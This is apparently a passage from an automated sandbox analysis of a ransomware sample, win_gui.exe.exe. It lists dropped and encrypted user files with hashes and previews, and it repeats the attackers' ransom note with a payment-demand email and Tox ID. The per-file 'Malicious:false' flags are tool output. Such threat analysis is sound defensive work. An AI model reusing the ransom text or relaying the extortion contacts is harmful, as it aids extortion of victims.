                                SSDEEP:48:x8h+ENcDUXEy5UzNg2YSpmd/WyYu+MAVMJg6THY:xIcDmEy5INk9devuAVOHY
                                MD5:C84BE515265BBB74E328546D3D112C38
                                SHA1:CD86122BE21E772AE4E6BCC7662A7C344E4A772A
                                SHA-256:18DE4C77F880CB2B1E87E2A124A46F38ECA8A461DF34EDDE256808A52A078857
                                SHA-512:E342596BCB1FBEF32167CE4897B15248CAF1D57230B90872E26E1C3F032E9C12D5ECC83747F6ACC7DC3BE6F314A5930B169AA463ACA807C0676CA3AA8E5EF653
                                Malicious:false
                                Preview:@d6<...U..kE.T..k[(.........{w.f...8.%L.........&.6.3.7M'.~}D.P.k...5..........gX`....&..V....... ..R.s]N>.}E..@q*...:.gn...p....@E.!.V.r*...#..e...d(....=d.;....Ju.u8.......3a.U..PAM.5.D..z.3..?....Ax...v...7..._.&;.t.N..+..V...w............m%s...Nv)V..;.z..1....#[.k..+..YoR.7K...).#.Kp....E.7......x'. .g...Qqq/.A......R(..7:2..n....bl.{t..B....Y.........u.=.B..@.../x......`v...0\...d .0..S..y.b..*.SzDx#.*..1o..2..h5..b.!)4.g|.]p.r'?p...]..=..........l..X..&r=.Z._8.R.b..L.t.....3..o(.'.....+.z....L..}..+8T..x.ex....P~..vv.8z.D.....I.....^v.N...#...dFw.V....._..\IH..^..x......".U...>%.......&~.e-.%.M.P..9.~...%..o...PbM..h...VU.g.[....>....b9...M....(j....>h.3...X..%2.9.L..ri...3.....o.N;..[."...]h..R.."3e..WzL.>&(P..b5^..P.e:e.s...+.i.|.V.*..;o.B..k.EM.vZ..m.....l..s..<.....MS.4N-..:\=....l...).....l.Kh.h...P.Mv....$f....S...}....*a."[x......$.57...P..k|W..#r../....(..Q.[t..|.Md....|q$.5]vc....l@.g...z.1u.9N...Z.B..d..s..@W.t<;...;W.

                                C:\Users\user\Downloads\NWCXBPIUYI.mp3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.868520355289455
                                Encrypted:false
                                SSDEEP:48:x8h+ENcDUXEy5UzNg2YSpmd/WyYu+MAVMJg6THY:xIcDmEy5INk9devuAVOHY
                                MD5:C84BE515265BBB74E328546D3D112C38
                                SHA1:CD86122BE21E772AE4E6BCC7662A7C344E4A772A
                                SHA-256:18DE4C77F880CB2B1E87E2A124A46F38ECA8A461DF34EDDE256808A52A078857
                                SHA-512:E342596BCB1FBEF32167CE4897B15248CAF1D57230B90872E26E1C3F032E9C12D5ECC83747F6ACC7DC3BE6F314A5930B169AA463ACA807C0676CA3AA8E5EF653
                                Malicious:false
                                Preview:@d6<...U..kE.T..k[(.........{w.f...8.%L.........&.6.3.7M'.~}D.P.k...5..........gX`....&..V....... ..R.s]N>.}E..@q*...:.gn...p....@E.!.V.r*...#..e...d(....=d.;....Ju.u8.......3a.U..PAM.5.D..z.3..?....Ax...v...7..._.&;.t.N..+..V...w............m%s...Nv)V..;.z..1....#[.k..+..YoR.7K...).#.Kp....E.7......x'. .g...Qqq/.A......R(..7:2..n....bl.{t..B....Y.........u.=.B..@.../x......`v...0\...d .0..S..y.b..*.SzDx#.*..1o..2..h5..b.!)4.g|.]p.r'?p...]..=..........l..X..&r=.Z._8.R.b..L.t.....3..o(.'.....+.z....L..}..+8T..x.ex....P~..vv.8z.D.....I.....^v.N...#...dFw.V....._..\IH..^..x......".U...>%.......&~.e-.%.M.P..9.~...%..o...PbM..h...VU.g.[....>....b9...M....(j....>h.3...X..%2.9.L..ri...3.....o.N;..[."...]h..R.."3e..WzL.>&(P..b5^..P.e:e.s...+.i.|.V.*..;o.B..k.EM.vZ..m.....l..s..<.....MS.4N-..:\=....l...).....l.Kh.h...P.Mv....$f....S...}....*a."[x......$.57...P..k|W..#r../....(..Q.[t..|.Md....|q$.5]vc....l@.g...z.1u.9N...Z.B..d..s..@W.t<;...;W.

                                C:\Users\user\Downloads\NYMMPCEIMA.jpg

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.857450306867071
                                Encrypted:false
                                SSDEEP:48:uTb3c/l0Q7hrSaecQi1HsEvnkO/WyYu+MAVMJg6TsC:uXc/l0WZSazQMHsE//evuAVOsC
                                MD5:DA9AC762F5306CB6E7D16E7DA6B925F3
                                SHA1:76B902E4CF7C82B6D70426BC5F7071ED4514BAA6
                                SHA-256:3EBEED41BDAFC537190682D84FEF185DEA51D46B2952059B77B648755E0E88FC
                                SHA-512:8BE14BC00E8F0BC7753D35C681458CA827216241CA5DE748FF7BB50248D67DB6F10ABB671E57CD3F7CD9AB86BBA5C3EFC0F711FB8F304CF9220041B2610841B3
                                Malicious:false
                                Preview:....|..^....r....XV*{l.....-.o.L2..-......4B...2.(...).@..e....(.6.$.L. ...b...t}.3......T.b....~.......l.3.........;..$..C............cf[..3.g......q.....g..........-.v$0b.h.!.:.........+0....2.FII..4*?J..X..P..i.c.R.\H.1.[...|[.'.73..-D..KoA....l1OjTK.U...ut..n..9.....R...(.w.d...lz../'...C...."..NY'%...{.!(....l..O...m.....?.c.a..........v.......g(...Rgc.n...p02......N.. .X..N.8.%3`.......z.....>.-..<1....a.d...`.u...k...ea$$..Q../r.>^+8).S..X(.O......g%..L(.4mK4.....[...%V"...pA*mv.. ........Kj.g...WH...JjC......"...S..G..v.V..?...wO...uJa.N.;O.<..T.{..Nq(.d%...=Z%.).....I...b..;..g..`.zX..z;Y_.['.U%N...3...].t4i!2.1..O..Y.OQ;D5...*.k..Kw..am....Z.. .tI....T.CE...5r-.*...bZ.....|..W(...U.....Y.K.q....F.y....T.w..T_.l_._..n.I.n..G.SN.9k.....L.....%`...%%Y.~....#.Y+.. .j.*.E%a...Qz|.1...N!...$.!.>....W-7#3./!C.E.W02.GY..wE.....N,..x..|.r........A:.3.....-b.0....<'N.xA...B..........H..0K...+?..Ms...F...V.y.V-..i.DX.....nK.9..w...

                                C:\Users\user\Downloads\NYMMPCEIMA.jpg.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.857450306867071
                                Encrypted:false
                                SSDEEP:48:uTb3c/l0Q7hrSaecQi1HsEvnkO/WyYu+MAVMJg6TsC:uXc/l0WZSazQMHsE//evuAVOsC
                                MD5:DA9AC762F5306CB6E7D16E7DA6B925F3
                                SHA1:76B902E4CF7C82B6D70426BC5F7071ED4514BAA6
                                SHA-256:3EBEED41BDAFC537190682D84FEF185DEA51D46B2952059B77B648755E0E88FC
                                SHA-512:8BE14BC00E8F0BC7753D35C681458CA827216241CA5DE748FF7BB50248D67DB6F10ABB671E57CD3F7CD9AB86BBA5C3EFC0F711FB8F304CF9220041B2610841B3
                                Malicious:false
                                Preview:....|..^....r....XV*{l.....-.o.L2..-......4B...2.(...).@..e....(.6.$.L. ...b...t}.3......T.b....~.......l.3.........;..$..C............cf[..3.g......q.....g..........-.v$0b.h.!.:.........+0....2.FII..4*?J..X..P..i.c.R.\H.1.[...|[.'.73..-D..KoA....l1OjTK.U...ut..n..9.....R...(.w.d...lz../'...C...."..NY'%...{.!(....l..O...m.....?.c.a..........v.......g(...Rgc.n...p02......N.. .X..N.8.%3`.......z.....>.-..<1....a.d...`.u...k...ea$$..Q../r.>^+8).S..X(.O......g%..L(.4mK4.....[...%V"...pA*mv.. ........Kj.g...WH...JjC......"...S..G..v.V..?...wO...uJa.N.;O.<..T.{..Nq(.d%...=Z%.).....I...b..;..g..`.zX..z;Y_.['.U%N...3...].t4i!2.1..O..Y.OQ;D5...*.k..Kw..am....Z.. .tI....T.CE...5r-.*...bZ.....|..W(...U.....Y.K.q....F.y....T.w..T_.l_._..n.I.n..G.SN.9k.....L.....%`...%%Y.~....#.Y+.. .j.*.E%a...Qz|.1...N!...$.!.>....W-7#3./!C.E.W02.GY..wE.....N,..x..|.r........A:.3.....-b.0....<'N.xA...B..........H..0K...+?..Ms...F...V.y.V-..i.DX.....nK.9..w...

                                C:\Users\user\Downloads\PALRGUCVEH.png

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.874479204520987
                                Encrypted:false
                                SSDEEP:48:oqDn37JyBNcYQyJjAvkh/WyYu+MAVMJg6Th:oqzLwBBAvEevuAVOh
                                MD5:127F1C88F94C7A0D1CD9F14B9F411719
                                SHA1:0C402C28A1E223905C8F1CF76F7E3E24CD5B8526
                                SHA-256:EC50AC5A71F058D4737F3D6CC63405CAADB40A705CCD626D0B453DACCA0380EF
                                SHA-512:8BCF45C007E470CA1DF705D3034D8051B6610A88144A1805FC30A5AFCCA81EA2AB0441FF838CE8788BF467AD90633AA835694066EAAB969DD486C805D0B43CFD
                                Malicious:false
                                Preview:bo.8W.0.k..D..Q.........j...Kp..n....].....!..V,...&...t.{l.F.*..9..4.q.{...V.L....g..l+!.9...w.~.6o..N..*....(..N....{0...T;...W.bKy.C}....M.....e.V.....q.yS...... ..y.....=.nY...p.$6...,_..\..V....xv.IL........c.4UpA.9Wed.5./S.....}X...K7.Rb.R..y.I.q....`rY.P=j.....\.N.71.@.Y....=.. .|..$..C...bn.i...4G..l0O...V%.....ra...s..J......L".J.d..?..}.j.g.n.J+k.Q..~n..<.....1M....|/.......CX:..`Gzu....;BC....".^.....e.,....`...^...KfQV.%....c....*."..y..>S...d.......N. ..H..)..oR...t..>..q?4..a+~......:.~.......EA.......I{;..e..H.......5)..k.4.N.m.....-..t..Qq..pB...v.@...d...=9.n.xP.)./.....%...ZO.L(!*U...H.(...'..7.\.H..n.O..D..;q...O%....n.@s.XP...L.W.h*.....1...9....)..Q..4-..D.ch.......V.)..:../..e.-u...]....m.HW<......Y8.$.'.C..!..A.....1=?.=B.J....CUdK..X...):Q.t...'.._.`%.v......... !.}(.......%c..M....=.\.LxO:..F..e...).;6..Fm.>..Q..Pk.g.....3..o.H,....1..E(.q.E*ckX..,W..R...^:o;w..G..f.n...=+Z) .... .E?.0..V.G.....\,.]...P.b.

                                C:\Users\user\Downloads\PALRGUCVEH.png.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.874479204520987
                                Encrypted:false
                                SSDEEP:48:oqDn37JyBNcYQyJjAvkh/WyYu+MAVMJg6Th:oqzLwBBAvEevuAVOh
                                MD5:127F1C88F94C7A0D1CD9F14B9F411719
                                SHA1:0C402C28A1E223905C8F1CF76F7E3E24CD5B8526
                                SHA-256:EC50AC5A71F058D4737F3D6CC63405CAADB40A705CCD626D0B453DACCA0380EF
                                SHA-512:8BCF45C007E470CA1DF705D3034D8051B6610A88144A1805FC30A5AFCCA81EA2AB0441FF838CE8788BF467AD90633AA835694066EAAB969DD486C805D0B43CFD
                                Malicious:false
                                Preview:bo.8W.0.k..D..Q.........j...Kp..n....].....!..V,...&...t.{l.F.*..9..4.q.{...V.L....g..l+!.9...w.~.6o..N..*....(..N....{0...T;...W.bKy.C}....M.....e.V.....q.yS...... ..y.....=.nY...p.$6...,_..\..V....xv.IL........c.4UpA.9Wed.5./S.....}X...K7.Rb.R..y.I.q....`rY.P=j.....\.N.71.@.Y....=.. .|..$..C...bn.i...4G..l0O...V%.....ra...s..J......L".J.d..?..}.j.g.n.J+k.Q..~n..<.....1M....|/.......CX:..`Gzu....;BC....".^.....e.,....`...^...KfQV.%....c....*."..y..>S...d.......N. ..H..)..oR...t..>..q?4..a+~......:.~.......EA.......I{;..e..H.......5)..k.4.N.m.....-..t..Qq..pB...v.@...d...=9.n.xP.)./.....%...ZO.L(!*U...H.(...'..7.\.H..n.O..D..;q...O%....n.@s.XP...L.W.h*.....1...9....)..Q..4-..D.ch.......V.)..:../..e.-u...]....m.HW<......Y8.$.'.C..!..A.....1=?.=B.J....CUdK..X...):Q.t...'.._.`%.v......... !.}(.......%c..M....=.\.LxO:..F..e...).;6..Fm.>..Q..Pk.g.....3..o.H,....1..E(.q.E*ckX..,W..R...^:o;w..G..f.n...=+Z) .... .E?.0..V.G.....\,.]...P.b.

                                C:\Users\user\Downloads\QCOILOQIKC.png

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.871101786799894
                                Encrypted:false
                                SSDEEP:48:c9go3TFaaDb/BPJnCCbIySqoDVz/WyYu+MAVMJg6TS3:c9txaaDb/BBnCCbIBqohevuAVOS3
                                MD5:D7B17E7CD6622D9665203EC1F8F024BD
                                SHA1:6E5BE482CFAA879215441126088AE3C088A621E8
                                SHA-256:4DFD3E69B21339A7930385CD3896CCD448EEB0BFD9981247B0EAFEAFCA1BA0AE
                                SHA-512:672BF9CE9CD4D94A14F2CA9AE91ABA95B7F3D6EF6F1BBDB4BF6E69B864CB0EEA524A200EA2C48307398FFB3B54B10DCBC173C82F86513EA596E8B605F32BB60D
                                Malicious:false
                                Preview:.zZy..v.Q..-8p..}...J...N..:.q<&b...}BJ...^....zV........A.{/..k{{n|.V({.O.}.2...*.2.....8.7...vU.....lb...q!4..vF.O.LE.m@.n.....`Z.....&.R....J....8.R..$S|:b.......A...8..A!.g..['a<.......9L69.pJ.;e{....A.:`....\...+U.%C...gD..`.....N..$.a.S....#{.n...WOE=./.K..&*.....0.....9,.......!..oH.08..{.Z.Z..#,!.L$.g.'.....f'K'.../....W..G.7~..'S..K.. ..Q-....`.BZ5.!>.Q..]s....d.9.KO.X!..oR.u[....e.....e..h0...-_..3[...H....Z?.....O%..hJ..R...q..........J.0A.k5.p3*..0..K...?..hU.-E<...0.9G...1W....%...m..L.y.....?..=.A....Ge(.`\.}..7+T.....$...V....... _e....>...k.W;..s..R.b...?.`.4e...............H.h......+.V!K..1.D....\.2.e..".Z.D{..F......l.7O...U....-...2...)...|....].J.f.O.q....oq..M....E...(x.....{9q"..%....y..u... ...P.x`.....i..d?.>.Uk_..A.\.............^.z..ywj....XV3$....d..f.Ydr...^4-.......RI.y.k=.PR5.<..Q.TvL.:..QuE).A...@.;...."..W...=.a^..I.......M.6=.R...7....dX.3....X...7'Rfc....tX.w.....bn...{...I.....b:D....k.l.\=...[..

                                C:\Users\user\Downloads\QCOILOQIKC.png.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.871101786799894
                                Encrypted:false
                                SSDEEP:48:c9go3TFaaDb/BPJnCCbIySqoDVz/WyYu+MAVMJg6TS3:c9txaaDb/BBnCCbIBqohevuAVOS3
                                MD5:D7B17E7CD6622D9665203EC1F8F024BD
                                SHA1:6E5BE482CFAA879215441126088AE3C088A621E8
                                SHA-256:4DFD3E69B21339A7930385CD3896CCD448EEB0BFD9981247B0EAFEAFCA1BA0AE
                                SHA-512:672BF9CE9CD4D94A14F2CA9AE91ABA95B7F3D6EF6F1BBDB4BF6E69B864CB0EEA524A200EA2C48307398FFB3B54B10DCBC173C82F86513EA596E8B605F32BB60D
                                Malicious:false
                                Preview:.zZy..v.Q..-8p..}...J...N..:.q<&b...}BJ...^....zV........A.{/..k{{n|.V({.O.}.2...*.2.....8.7...vU.....lb...q!4..vF.O.LE.m@.n.....`Z.....&.R....J....8.R..$S|:b.......A...8..A!.g..['a<.......9L69.pJ.;e{....A.:`....\...+U.%C...gD..`.....N..$.a.S....#{.n...WOE=./.K..&*.....0.....9,.......!..oH.08..{.Z.Z..#,!.L$.g.'.....f'K'.../....W..G.7~..'S..K.. ..Q-....`.BZ5.!>.Q..]s....d.9.KO.X!..oR.u[....e.....e..h0...-_..3[...H....Z?.....O%..hJ..R...q..........J.0A.k5.p3*..0..K...?..hU.-E<...0.9G...1W....%...m..L.y.....?..=.A....Ge(.`\.}..7+T.....$...V....... _e....>...k.W;..s..R.b...?.`.4e...............H.h......+.V!K..1.D....\.2.e..".Z.D{..F......l.7O...U....-...2...)...|....].J.f.O.q....oq..M....E...(x.....{9q"..%....y..u... ...P.x`.....i..d?.>.Uk_..A.\.............^.z..ywj....XV3$....d..f.Ydr...^4-.......RI.y.k=.PR5.<..Q.TvL.:..QuE).A...@.;...."..W...=.a^..I.......M.6=.R...7....dX.3....X...7'Rfc....tX.w.....bn...{...I.....b:D....k.l.\=...[..

                                C:\Users\user\Downloads\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\user\Downloads\ZGGKNSUKOP.jpg

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.874709719588937
                                Encrypted:false
                                SSDEEP:48:6IIuN5UJMo1YifEKlnSlck/WyYu+MAVMJg6T8W:6IIjJ1TEenS5evuAVOl
                                MD5:B41ACD7199A638614A8A7E8CB7047AF4
                                SHA1:B006CA9539443DAD8D7E078006FD14A0E15755C3
                                SHA-256:67C62F3B4B6B81A3466836B74AB924D795F27364CC0D8EB1886E5E7F25469F34
                                SHA-512:A6F7D71ED3F513A25FD7C6BA61EF840055E3F08A546E1A7F69AFC5326EF2109707D530C690473C883E57B8F975F74538E65FFDB7AB5763E83180C82951CD080C
                                Malicious:false
                                Preview:\..@{..D.........R!C=.y../{........{.far@W..@.....DPB.G)Y..?>...n.$.]Q,P..qS.......A.:... .y.Y.....m2...L.......:.8f.j....:...1... ..1.N.c...WZK:J.J.N...L.v.P7...z.T...LC.z.St[....r.".D<.1.!...]oXG.v.D....... G3....0t....9............a...qf9...I..7... y..b...o.m....V.z2..o}...x..Y.H.7.N.$...b.xK.:['%-L...{..B..#~..\yh..m..e.....{..5.........R....M.7...8*B*....y..L..U......z ..=E...,..-[a7.F{a..(...#0.....X...$..,.'...0.>A..C..j=#tP}XQ.Y..@(.x..t..c.....t..D..6w#...[..~ii..KV.+.*...*\..|])_.o.N@.9....0.q.......t.(.....-....~u@..1.P..\.....' ..w.2}y..Db....F..]...u...l>1.Z.b^....!...S.M..D`.g.....+s.o..;=.8...X...r.f..0*.).Cd.Pj........`.)..^.....K..!O.a....1Y.._.p..'N.%.[.~.H..#.....D...:..f..Ta..I...u.H....../....;..78N/.|...a1...v..ev.....&u.F~...&.d..*C..CVs..U.- .{..r.k..CX.[D.;..f8.?%..i..Q2h.l.w..}1.Ysk.X..._'........N.. .}...A...,.\..S.!iy{I.V.(.8H...I./.;.'.......i7.U!dn.H....Y...7.7WS`E.........g..=^)9z^.-6..q.....6%.'......M._M|.

                                C:\Users\user\Downloads\ZGGKNSUKOP.jpg.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.874709719588937
                                Encrypted:false
                                SSDEEP:48:6IIuN5UJMo1YifEKlnSlck/WyYu+MAVMJg6T8W:6IIjJ1TEenS5evuAVOl
                                MD5:B41ACD7199A638614A8A7E8CB7047AF4
                                SHA1:B006CA9539443DAD8D7E078006FD14A0E15755C3
                                SHA-256:67C62F3B4B6B81A3466836B74AB924D795F27364CC0D8EB1886E5E7F25469F34
                                SHA-512:A6F7D71ED3F513A25FD7C6BA61EF840055E3F08A546E1A7F69AFC5326EF2109707D530C690473C883E57B8F975F74538E65FFDB7AB5763E83180C82951CD080C
                                Malicious:false
                                Preview:\..@{..D.........R!C=.y../{........{.far@W..@.....DPB.G)Y..?>...n.$.]Q,P..qS.......A.:... .y.Y.....m2...L.......:.8f.j....:...1... ..1.N.c...WZK:J.J.N...L.v.P7...z.T...LC.z.St[....r.".D<.1.!...]oXG.v.D....... G3....0t....9............a...qf9...I..7... y..b...o.m....V.z2..o}...x..Y.H.7.N.$...b.xK.:['%-L...{..B..#~..\yh..m..e.....{..5.........R....M.7...8*B*....y..L..U......z ..=E...,..-[a7.F{a..(...#0.....X...$..,.'...0.>A..C..j=#tP}XQ.Y..@(.x..t..c.....t..D..6w#...[..~ii..KV.+.*...*\..|])_.o.N@.9....0.q.......t.(.....-....~u@..1.P..\.....' ..w.2}y..Db....F..]...u...l>1.Z.b^....!...S.M..D`.g.....+s.o..;=.8...X...r.f..0*.).Cd.Pj........`.)..^.....K..!O.a....1Y.._.p..'N.%.[.~.H..#.....D...:..f..Ta..I...u.H....../....;..78N/.|...a1...v..ev.....&u.F~...&.d..*C..CVs..U.- .{..r.k..CX.[D.;..f8.?%..i..Q2h.l.w..}1.Ysk.X..._'........N.. .}...A...,.\..S.!iy{I.V.(.8H...I./.;.'.......i7.U!dn.H....Y...7.7WS`E.........g..=^)9z^.-6..q.....6%.'......M._M|.

                                C:\Users\user\Downloads\ZGGKNSUKOP.xlsx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.8745675624570675
                                Encrypted:false
                                SSDEEP:48:lU0V46X8FOestKRjapG/WyYu+MAVMJg6T0:lU0e6r5KRjapGevuAVO0
                                MD5:8AF247AF08B25B06A4579412AD7FD0FF
                                SHA1:8DFD511C770C460EAF6D5E73BC4973ACC6A18395
                                SHA-256:E74CFF87B4A588D7A804FD9FDE0BB7CEBD163B1DCADF588B8D9AD321A78D7B95
                                SHA-512:E48D55A55B46FF8F2F3E0DFA54985BB2C563C2136A256DE44112C97C679C7388EE2B4887EC4557F16A519AD4E59908C556F79FEE6F01883A5DEFBF6BAAB4F746
                                Malicious:false
                                Preview:....E.i..fZ.=..*......4D2qF..T..#...?mQ...;...w$...eA...A..}..&X..n......+I.u-?.J2.bh..z~....Q.h..X.......^S...mQ.>..;k-.t.#.b...p..mD%U..j/5....f.Z..?.u.t.\.K......4nmk.he.P5.ge.{.k..'.M.....V.hj....>......d^..Y..."iR...7s.0.!.P....7.dh..N.>.@S~.WI...l.l.:..V.5...Mh!.k..A..5.x.....r...~w..`....2"I..I....1..d(.+X.cumiwR.....d.....yl..z5.f......+V.. ..D..7......ZP3/l..3.R.C....L.2)...w.==.R...N.Hn...._..k...~1"..0.k.....gpx.Jk~.H{.$U..,.YxS.QU......)....9..F7.&.....b....\........4..hz....F~ 6W....I..;5.W.K.X..wa.]....... ...@....qd..k.gQ.P.X..W..i4\....j...o....5.9...w."......]...x.W.x# -.~.lG&...AJ.y..99.NA......../....=..c..]6u........}...6..O..4....b.>....`..........C......4..{u..l.8:.U$...AZ+m`...}7.T.|.\.a.c......Q.......s!..-.....:...E<V.....q/.X.<).......D...b.wS.....fa..s..0C72.F..y. ........)......0sR.D..~.m.....;.'..Q..^..M......R...Z..!6.B..qxX.fs.5.....S\.......#.....m......<.t.j...l.#.M...%.... ....i...P...r...%Y..u..........

                                C:\Users\user\Downloads\ZGGKNSUKOP.xlsx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.8745675624570675
                                Encrypted:false
                                SSDEEP:48:lU0V46X8FOestKRjapG/WyYu+MAVMJg6T0:lU0e6r5KRjapGevuAVO0
                                MD5:8AF247AF08B25B06A4579412AD7FD0FF
                                SHA1:8DFD511C770C460EAF6D5E73BC4973ACC6A18395
                                SHA-256:E74CFF87B4A588D7A804FD9FDE0BB7CEBD163B1DCADF588B8D9AD321A78D7B95
                                SHA-512:E48D55A55B46FF8F2F3E0DFA54985BB2C563C2136A256DE44112C97C679C7388EE2B4887EC4557F16A519AD4E59908C556F79FEE6F01883A5DEFBF6BAAB4F746
                                Malicious:false
                                Preview:....E.i..fZ.=..*......4D2qF..T..#...?mQ...;...w$...eA...A..}..&X..n......+I.u-?.J2.bh..z~....Q.h..X.......^S...mQ.>..;k-.t.#.b...p..mD%U..j/5....f.Z..?.u.t.\.K......4nmk.he.P5.ge.{.k..'.M.....V.hj....>......d^..Y..."iR...7s.0.!.P....7.dh..N.>.@S~.WI...l.l.:..V.5...Mh!.k..A..5.x.....r...~w..`....2"I..I....1..d(.+X.cumiwR.....d.....yl..z5.f......+V.. ..D..7......ZP3/l..3.R.C....L.2)...w.==.R...N.Hn...._..k...~1"..0.k.....gpx.Jk~.H{.$U..,.YxS.QU......)....9..F7.&.....b....\........4..hz....F~ 6W....I..;5.W.K.X..wa.]....... ...@....qd..k.gQ.P.X..W..i4\....j...o....5.9...w."......]...x.W.x# -.~.lG&...AJ.y..99.NA......../....=..c..]6u........}...6..O..4....b.>....`..........C......4..{u..l.8:.U$...AZ+m`...}7.T.|.\.a.c......Q.......s!..-.....:...E<V.....q/.X.<).......D...b.wS.....fa..s..0C72.F..y. ........)......0sR.D..~.m.....;.'..Q..^..M......R...Z..!6.B..qxX.fs.5.....S\.......#.....m......<.t.j...l.#.M...%.... ....i...P...r...%Y..u..........

                                C:\Users\user\Favorites\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\user\Links\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
